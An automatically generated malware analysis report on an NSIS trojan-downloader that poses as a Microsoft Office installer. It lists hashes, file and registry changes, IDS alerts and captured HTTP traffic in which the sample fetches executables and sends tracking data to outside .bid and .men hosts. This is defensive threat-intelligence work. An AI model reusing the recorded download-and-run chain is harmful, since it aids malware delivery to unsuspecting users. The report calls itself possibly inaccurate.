Trojan.NSIS.StartPage_ef04622cab

by malwarelabrobot on April 11th, 2018 in Malware Descriptions.

Trojan.GenericKD.12794050 (BitDefender), Trojan:Win32/Tiggre!rfn (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Vittalia.7648 (DrWeb), Trojan.GenericKD.12794050 (B) (Emsisoft), RDN/Generic Downloader.x (McAfee), Trojan.Gen (Symantec), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R047C0DHD17 (TrendMicro), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: ef04622cab1dd61e1fa334064f92acd7
SHA1: de8cdb3b41d3e47578aa40fc3e060d25afe81086
SHA256: 8f539007e63bee3425d63205421948c495cd5dde89566da4ad79b582d00cff04
SSDeep: 6144:te34B/NEQq Rq/uMXOy7v9P92hWTnmPZ1HAND0uMiGrq4:9dRQ/ey7mhaTNg/h
Size: 334312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

v2kPpgYau1.exe:3084
cpSetup.exe:3888

The Trojan injects its code into the following process(es):

setup.exe:3488
%original file name%.exe:4000

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-header.bmp (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\ioSpecial.ini (4557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-wizard.bmp (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll (30 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp (0 bytes)

The process %original file name%.exe:4000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe (2888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B (4232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\launcher[1].htm (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe (3705 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp (0 bytes)

The process v2kPpgYau1.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (156691 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (30 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (0 bytes)

The process cpSetup.exe:3888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\normal_bg4[1].png (4541 bytes)

Registry activity

The process %original file name%.exe:4000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASAPI32]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process cpSetup.exe:3888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1523305243"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
92c08ce1c12da0d516f82142f5a1e15e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe
c17103ae9072a06da581dec998343fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll
05230afdeeb13718e926fd654de63f12 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
92c08ce1c12da0d516f82142f5a1e15e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe
325b008aec81e5aaa57096f05d4212b5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll
c17103ae9072a06da581dec998343fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll
7579ade7ae1747a31960a228ce02e666 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 32168 32256 2.84253 a383d097c0b560d66c572d1b562b40bf

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Backdoor User-Agent (InstallCapital)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /08e0b779-c1db-404a-b9a2-b4657d709f22 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: trk.railquince.bid
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Date: Tue, 10 Apr 2018 06:22:44 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Pragma: no-cache
Server: nginx
Set-Cookie: 08e0b779-c1db-404a-b9a2-b4657d709f22-v4=08e0b779-c1db-404a-b9a2-b4657d709f22;domain=trk.railquince.bid;path=/;HttpOnly
Set-Cookie: voluum-cid-v4={
  "cid" : "w2R2EF8L6VTQEU3DH6K5303Q",
  "caid" : "08e0b779-c1db-404a-b9a2-b4657d709f22"
};Max-Age=31536000;Expires=Wed, 10-Apr-2019 06:22:44 GMT;domain=trk.railquince.bid;path=/;HttpOnly
Content-Length: 0
Connection: keep-alive


GET /?affId=1006&appTitle=MICROSOFT Office PRO Plus 2016&s1=539&s2=18778101&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: horn.matchthrill.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 2294784
Connection: close
Server: nginx/1.10.1
Date: Tue, 10 Apr 2018 06:22:33 GMT
X-Powered-By: PHP/5.5.38
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
X-Cache: Miss from cloudfront
Via: 1.1 42e68676a49ad69c68767a987640fbe2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: secxPupQXfQurJznQBqVZPp4HXA41K5wHY8KCSHB_de85VwsOJ-T9g==

<<< skipped >>>

GET /ads.js?stam=err HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.s3.amazonaws.com
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: MpLAiXjBlnesCK3wdwr0CT8dzilCoOhbykw3qJ2Pqssgzi6scjvfspvtRQu5rh6cBjwdGmOOhTE=
x-amz-request-id: 348A908211C6D4F4
Date: Tue, 10 Apr 2018 06:22:46 GMT
Last-Modified: Thu, 12 Jan 2017 15:34:57 GMT
ETag: "bebd18b90969d9319e931acf4d682aa4"
x-amz-meta-cb-modifiedtime: Mon, 09 Jan 2017 12:15:17 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 24
Server: AmazonS3
window.adsAreOk2 = true


GET /launcher.php?p=sevenzip&tid=18778101&pid=539&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2IHYxNi4wLjQyMjkuMTAyMCBGaW5hbCBOb3YuVXBkYXRl&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: bun.companythings.bid
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 172
Connection: keep-alive
Date: Tue, 10 Apr 2018 06:22:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 4001cc23eb32ec3ac8fe5303310fc493.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HivUAMckC8jaEjZGlSzmOBdZ0uYvjQQFtHVQOa2HwOco7BRjaNSkoQ==
s=first
u=hXXp://ake.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update


GET /launch_v5.php?p=&pid=539&tid=18778101&b_typ=pe&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2&reb=1&ic= HTTP/1.0
Host: bun.warspade.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 313
Connection: close
Date: Tue, 10 Apr 2018 06:22:31 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 14ddb67fb657f269f4087e4b3c5a9f59.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 443b85utUFIZj-cqyw30K1qei4MewLp40qcNpqcR6bReLAQakMDYZw==
files=5
t1=dl
u1=hXXp://horn.matchthrill.bid/?affId=1006&appTitle=MICROSOFT Office PRO Plus 2016&s1=539&s2=18778101&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
fn1=Components
fn2=File opener
fn3=File finder
fn4=SevenZip
ftitle=to run your file
itype=silent


GET /stats.php?bu=&c=&step=1 HTTP/1.0
Host: gold.powerstring.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Tue, 10 Apr 2018 06:22:45 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 745a4b74c94cd415d3d1a79d835f24f5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 03U3bupTXyjksi43rTwLVjT-z-I7_-md252iC95ZQaesQwejtG0rdQ==


GET /stats.php?bu=&c=&step=2 HTTP/1.0
Host: gold.powerstring.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Tue, 10 Apr 2018 06:22:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 14ddb67fb657f269f4087e4b3c5a9f59.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HD-Ci55ABJrFn9vChcT62SkchDjCNGYe8lYg6sG4gEWhzyLArMSMSQ==


GET /pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.bundlessafevault.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1041
Connection: keep-alive
Date: Sun, 07 Jan 2018 06:31:08 GMT
Last-Modified: Tue, 20 Jun 2017 11:04:26 GMT
ETag: "1a020086610d48a917b9d08a84026ad5"
Accept-Ranges: bytes
Server: AmazonS3
Age: 84348
X-Cache: Hit from cloudfront
Via: 1.1 09696b72fd824c461b396d99379987a3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GjA_I5e5iabD4SHQ0Ryf9TAd5-1s1NSYEpHDuGljab0X6goSSv2kKQ==
<!doctype html>
<html>
<head lang="en">
<title>Thank you page</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="../public/css/style.css">
<script src="../public/js/jquery.min.js" type="text/javascript"></script>
</head>
<body>
<div class="wrapper">
<div class="header">
<div class="title">
<div class="title-caption">Thank you for downloading!</div>
</div>
</div>
<div class="content">
<div class="inner">
<div class="adnl_zone">
</div>
</div>
</div>
</div>
<script type="text/javascript">
window.tagUrl = 'http://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=';
</script>
<script src="hXXp://ic-dc.s3.amazonaws.com/pr/public/js/adframe.js" type="text/javascript"></script>
<script src="hXXp://ic-dc.s3.amazonaws.com/ads.js?stam=err" type="text/javascript"></script>
<script src="../public/js/detector.js" type="text/javascript"></script>
</body>
</html>

<<< skipped >>>

POST hXXp://lip.healthcakes.men/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: lip.healthcakes.men
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 212

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1118540&id[]=1118541&id[]=453683&id[]=453684&id[]=453685&id[]=453686&id[]=686787&id[]=686788&id[]=686789&id[]=686790&id[]=856042&id[]=856043&id[]=856338&id[]=856339


HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Tue, 10 Apr 2018 06:22:41 GMT
Content-Type: text/html
Content-Length: 694
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 43b9f4d448ebe6351f89a9711a64ab54.cloudfront.net (CloudFront)
X-Amz-Cf-Id: igD48ZnOniak9ymieuzNsq71DYLDe17u_PGTQVcfR2anXuUnM227oA==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: igD48ZnOniak9ymieuzNsq71DYLDe17u_PGTQVcfR2anXuUnM227oA==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>


GET /stats.php?bu=&c=&step=3 HTTP/1.0
Host: gold.powerstring.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Tue, 10 Apr 2018 06:22:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 43c3e9179a39d087f25c9ddba8a3d184.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vdPAtRf6Lk3xBydG1qcx4NVTCXor2OHaAnFaEZ_1jrgqJmogQ1qDCg==


GET /stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: ake.needmonth.bid
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 47843
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5acc58219a70e.exe"
X-Powered-By: ASP.NET
Date: Tue, 10 Apr 2018 06:22:26 GMT
X-Cache: Miss from cloudfront
Via: 1.1 556e1e002dcf7a95ee196fc550f9ea94.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DbyLXBGAa8yHgZtTS9FuBwb4qBg_YwhsjZk7Sbyh5D0Yse2rl1ynJg==

<<< skipped >>>

GET /stats.php?bu=&c=&step=4 HTTP/1.0
Host: gold.powerstring.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Tue, 10 Apr 2018 06:22:47 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 4001cc23eb32ec3ac8fe5303310fc493.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HN4VJWQolcKAzqbgL7lvv4kzfwfWPDXA8qEoiyIFPDYSaGSswqWlOQ==


GET /ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778; Domain=.VVV.1-1ads.com; Expires=Thu, 09-Apr-2020 06:22:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1307
Date: Tue, 10 Apr 2018 06:22:45 GMT
<!DOCTYPE html><html><head><!--120492:5103--></head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<script type="text/javascript">new Image().src = "hXXp://VVV.1-1ads.com/impression.gif?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800&sw=1280&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg*~dnRs*~Y3Jy*~ZXhsZA*&s=03e8cba91683911ccd51608978f73922&t=1523341365531";</script>
<a href="hXXps://VVV.facebook.com/campaign/landing.php?campaign_id=450270011836003&extra_1=10390&placement=5103&creative=120492&keyword=&partner_id=ironsource&extra_2=UA" onmousedown="(function(a){a&&a.href&&(a.onmousedown='',a.href='hXXp://www.1-1ads.com/cr?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800.0&sw=1280.0&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg*~dnRs*~Y3Jy*~ZXhsZA*&UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778&t=1523341365531&u=https://VVV.facebook.com/campaign/landing.php?campaign_id=450270011836003&extra_1=10390&placement=5103&creative=120492&keyword=&partner_id=ironsource&extra_2=UA')})(this);return!1;" target="_blank"><img border="0" alt="" src="http://irncdn.com/files135/65/10390/120492/FB_RU_800_Icons2.jpg" width="800" height="440"></a>
</body></html>

<<< skipped >>>

GET /pr/public/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.bundlessafevault.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1472
Connection: keep-alive
Date: Thu, 29 Jun 2017 11:20:46 GMT
Last-Modified: Thu, 21 Jul 2016 07:28:41 GMT
ETag: "d87938f58e3b40da8272e3eb0c1b47d3"
Accept-Ranges: bytes
Server: AmazonS3
Age: 82740
X-Cache: Hit from cloudfront
Via: 1.1 e6b91293dd7890a2ad1d12ed6444c502.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zmx-BtyZPd4qKBgvnUSFF_l4fD9wDv4pxsqh_WCUmltJAXvIkvtHGw==
body {
  padding: 0;
  margin: 0;
  background-color: white;
  font-family: arial, sans-serif;
  color: #0b0b0b; }

.wrapper {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0; }
  .wrapper .header {
    height: 294px;
    margin: 0 auto;
    background-color: #0b0b0b; }
    .wrapper .header .title {
      color: white;
      text-align: center; }
      .wrapper .header .title .title-caption, .wrapper .header .title .title-caption-inter {
        text-align: center;
        font-style: italic;
        font-weight: 600;
        font-size: 38px;
        line-height: 103px; }
      .wrapper .header .title .title-caption-inter {
        line-height: 40px;
        padding-top: 30px; }
      .wrapper .header .title .title-description {
        font-size: 20px;
        padding-top: 10px;
        width: 615px;
        margin: 0 auto;
        font-style: italic; }
  .wrapper .content {
    text-align: center;
    margin: 0 auto;
    height: 654px;
    background-color: white; }
    .wrapper .content .inner, .wrapper .content .inner-typ {
      top: -191px;
      margin: 0 auto;
      position: relative;
      width: 800px;
      height: 440px;
      border: 20px solid #bfccd2;
      background-color: white; }
    .wrapper .content .inner-typ {
      top: -140px; }
    .wrapper .content .adnl_zone {
      position: absolute;
      background-color: #bfccd2;
      margin: auto;
      top: 0;
      right: 0;
      left: 0;
      bottom: 0; }

<<< skipped >>>

